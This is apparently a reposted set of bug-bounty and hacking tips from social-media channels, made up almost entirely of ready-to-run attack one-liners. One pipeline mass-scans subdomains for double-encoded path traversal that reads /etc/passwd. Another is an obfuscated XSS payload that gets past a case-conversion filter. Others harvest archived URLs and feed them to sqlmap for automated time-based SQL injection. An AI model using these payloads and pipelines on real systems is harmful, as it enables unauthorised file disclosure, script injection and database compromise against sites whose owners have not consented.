Sick Finding 🥵⚡️

cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt

#tip
——————
0Day.Today
@LearnExploit
@Tech_Army

XSS Tip 🥵

If alert() is being converted to ALERT() and you can use
Like onerror="

𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

#XSS #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army

SQLMap from Waybackurls ⚡️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql #sql_injection #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#Fuzz #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Time based SQL Injection using waybackurls

waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt

#sql_injection #sql #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army